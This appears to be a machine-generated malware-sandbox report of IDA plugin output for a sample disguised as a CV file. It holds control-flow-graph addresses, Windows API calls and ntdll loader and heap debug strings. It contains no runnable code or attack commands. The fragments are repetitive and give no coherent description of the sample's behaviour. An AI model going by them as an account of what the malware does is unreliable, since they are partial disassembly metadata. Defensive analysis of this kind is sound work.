                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 004142F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 72 414283-414295 73 41429d-4142ea call 42f1f3 call 417943 call 404783 call 424f83 72->73 74 414298 call 42e7e3 72->74 84 41430a-414310 73->84 85 4142ec-4142fb PostThreadMessageW 73->85 74->73 85->84 86 4142fd-414307 85->86 86->84
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 004142F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 111 42c9d3-42ca17 call 404813 call 42d8f3 RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E6C1,?,?,00000000,?,0041E6C1,?,?,?), ref: 0042CA12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 116 42ca23-42ca64 call 404813 call 42d8f3 RtlFreeHeap
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,89C3D2E1,00000007,00000000,00000004,00000000,0041722F,000000F4), ref: 0042CA5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 126 42ca73-42caac call 404813 call 42d8f3 ExitProcess
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,FD3F25B5,?,?,FD3F25B5), ref: 0042CAA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 131 f82b2a-f82b2f 132 f82b3f-f82b46 LdrInitializeThunk 131->132 133 f82b31-f82b38 131->133
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  Strings
                                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FF8B6F
                                                                                                  • The instruction at %p referenced memory at %p., xrefs: 00FF8A62
                                                                                                  • write to, xrefs: 00FF8AD6
                                                                                                  • *** enter .cxr %p for the context, xrefs: 00FF8B3D
                                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FF8AB4
                                                                                                  • *** Inpage error in %ws:%s, xrefs: 00FF8A48
                                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FF8A06
                                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FF89BF
                                                                                                  • read from, xrefs: 00FF8ADD, 00FF8AE2
                                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FF890C
                                                                                                  • The critical section is owned by thread %p., xrefs: 00FF89E9
                                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FF8AAD
                                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FF8AA6
                                                                                                  • *** then kb to get the faulting stack, xrefs: 00FF8B4C
                                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00FF8923
                                                                                                  • *** enter .exr %p for the exception record, xrefs: 00FF8B21
                                                                                                  • an invalid address, %p, xrefs: 00FF8AFF
                                                                                                  • <unknown>, xrefs: 00FF88AE, 00FF8901, 00FF8980, 00FF89C9, 00FF8A47, 00FF8ABE
                                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FF89CB
                                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 00FF8ABF
                                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FF8944
                                                                                                  • Go determine why that thread has not released the critical section., xrefs: 00FF89F5
                                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FF8953
                                                                                                  • The instruction at %p tried to %s , xrefs: 00FF8AE6
                                                                                                  • The resource is owned shared by %d threads, xrefs: 00FF89AE
                                                                                                  • The resource is owned exclusively by thread %p, xrefs: 00FF89A4
                                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 00FF8982
                                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FF8935
                                                                                                  • This failed because of error %Ix., xrefs: 00FF8A76
                                                                                                  • a NULL pointer, xrefs: 00FF8B10
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  Strings
                                                                                                  • Critical section address, xrefs: 00FB5230, 00FB52C7, 00FB533F
                                                                                                  • Address of the debug info found in the active list., xrefs: 00FB52B9, 00FB5305
                                                                                                  • Invalid debug info address of this critical section, xrefs: 00FB52C1
                                                                                                  • undeleted critical section in freed memory, xrefs: 00FB5236
                                                                                                  • Critical section address., xrefs: 00FB530D
                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 00FB534E
                                                                                                  • 8, xrefs: 00FB50EE
                                                                                                  • double initialized or corrupted critical section, xrefs: 00FB5313
                                                                                                  • corrupted critical section, xrefs: 00FB52CD
                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB52ED
                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB5215, 00FB52A1, 00FB5324
                                                                                                  • Critical section debug info address, xrefs: 00FB522A, 00FB5339
                                                                                                  • Thread identifier, xrefs: 00FB5345
                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB52D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  Strings
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FB22A2
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FB221C
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FB23F5
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FB2429
                                                                                                  • @, xrefs: 00FB23A5
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FB242E
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FB22CA
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FB240C
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FB20EE
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FB2310
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FB2213
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-3197712848
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                  • API String ID: 0-1357697941
                                                                                                  Strings
                                                                                                  • VerifierFlags, xrefs: 00FC88D0
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FC86E7
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 00FC880F
                                                                                                  • VerifierDlls, xrefs: 00FC893D
                                                                                                  • VerifierDebug, xrefs: 00FC8925
                                                                                                  • HandleTraces, xrefs: 00FC890F
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FC86BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  Strings
                                                                                                  • LdrpGenericExceptionFilter, xrefs: 00FC4A7C
                                                                                                  • LdrpProtectedCopyMemory, xrefs: 00FC4A74
                                                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 00FC4AB8
                                                                                                  • Execute '.cxr %p' to dump context, xrefs: 00FC4B31
                                                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 00FC4A75
                                                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 00FC4A86
                                                                                                  • ***Exception thrown within loader***, xrefs: 00FC4AA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-2973941816
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                  • API String ID: 0-1109411897
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  Strings
                                                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00FB2579
                                                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00FB2510
                                                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00FB25A6
                                                                                                  • @, xrefs: 00F72D6D
                                                                                                  • .Local\, xrefs: 00F72CB1
                                                                                                  • \WinSxS\, xrefs: 00F72D43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                  • API String ID: 0-3926108909
                                                                                                  Strings
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F99790
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F997B9
                                                                                                  • LdrpInitShimEngine, xrefs: 00F99783, 00F99796, 00F997BF
                                                                                                  • apphelp.dll, xrefs: 00F36446
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F9977C
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F997A0, 00F997C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-204845295
                                                                                                  Strings
                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FB7FF0
                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 00FB7F7B
                                                                                                  • LdrpInitializeProcess, xrefs: 00F7C5E4
                                                                                                  • LdrpInitializeImportRedirection, xrefs: 00FB7F82, 00FB7FF6
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FB7F8C, 00FB8000
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F7C5E3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 0-475462383
                                                                                                  Strings
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FB1FC9
                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FB1FA9
                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 00FB1F6A, 00FB1FA4, 00FB1FC4
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FB1F8A
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 00FB1F6F
                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FB1F82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  Strings
                                                                                                  • @, xrefs: 00F784B1
                                                                                                  • LdrpInitializeProcess, xrefs: 00F78342
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F7847E
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F78341
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  Strings
                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00FA52FA
                                                                                                  • HEAP[%wZ]: , xrefs: 00FA52DE, 00FA539F
                                                                                                  • HEAP: , xrefs: 00FA52ED, 00FA53AE
                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00FA53BB
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                  Strings
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FB1FE3, 00FB20BB
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FB20C0
                                                                                                  • .Local, xrefs: 00F727F8
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 00FB1FE8
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                  Strings
                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FB3241
                                                                                                  • RtlDeactivateActivationContext, xrefs: 00FB322F, 00FB323C, 00FB325B
                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FB3260
                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FB3234
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                  Strings
                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FA0E72
                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FA0EB5
                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FA0E2F
                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FA0DEC
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 00FB344A, 00FB3476
                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 00FB3466
                                                                                                  • LdrpFindDllActivationContext, xrefs: 00FB3440, 00FB346C
                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00FB3439
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                  Strings
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA79F
                                                                                                  • LdrpDynamicShimModule, xrefs: 00FAA7A5
                                                                                                  • apphelp.dll, xrefs: 00F62382
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FAA7AF
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $@
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                  Strings
                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 00FA9F1C
                                                                                                  • LdrpCheckModule, xrefs: 00FA9F24
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FA9F2E
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-161242083
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-1334570610
                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F3CCD4
                                                                                                  • @, xrefs: 00F3CD03
                                                                                                  • InstallLanguageFallback, xrefs: 00F3CD1F
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                  • API String ID: 0-1757540487
                                                                                                  Strings
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 00FB80E9
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 00FB80E2
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FB80F3
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1783798831
                                                                                                  Strings
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FC4519
